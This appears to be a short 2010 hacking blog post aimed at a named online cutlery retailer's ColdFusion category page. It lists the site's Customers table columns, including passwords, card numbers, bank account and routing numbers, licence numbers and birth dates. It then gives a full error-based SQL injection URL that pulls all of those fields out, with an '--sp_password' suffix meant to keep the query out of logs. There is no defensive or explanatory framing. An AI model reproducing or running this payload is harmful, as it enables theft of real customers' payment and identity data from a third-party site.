Wednesday, December 1, 2010

*.cfm site


http://www.covecutlery.com/Category.cfm?CategoryID=173


.:: Table:
Customers


.:: Column:
CustomersID
FirstName
LastName
UserName
Password
CompanyName
Email
Address
Address2
City
State
PostalCode
OrderCountry
Phone
CardAddress
CardName
CardDate
CardNumber
CardZip
BankName
AcctNumber
RoutingNumber
DriversLicenseNumber
DLState
DateOfBirth
MailingList
WorkPhone
Fax


http://www.covecutlery.com/Category.cfm?CategoryID=173 and 1=convert(int,(SELECT TOP 1 (char(124)+char(32)+convert(varchar(256),isnull(A0.CustomersID,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.FirstName,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.LastName,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.UserName,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.Password,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.CompanyName,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.Email,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.Address,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.Address2,char(32)))+char(32)+char(124)+cha
r(32)+convert(varchar(256),isnull(A0.City,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.State,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.PostalCode,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.OrderCountry,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.Phone,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.CardAddress,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.CardName,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.CardDate,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.CardNumber,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.CardZip,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.BankName,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.AcctNumber,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.RoutingNumber,char(32)))+char(32)+char(124)+char(32)+convert(varch
ar(256),isnull(A0.DriversLicenseNumber,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.DLState,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.DateOfBirth,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.MailingList,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.WorkPhone,char(32)))+char(32)+char(124)+char(32)+convert(varchar(256),isnull(A0.Fax,char(32)))+char(124)+char(32)) FROM Customers as A0 ))--sp_password

No comments:

Template by : mhiman@ hacker-newbie.org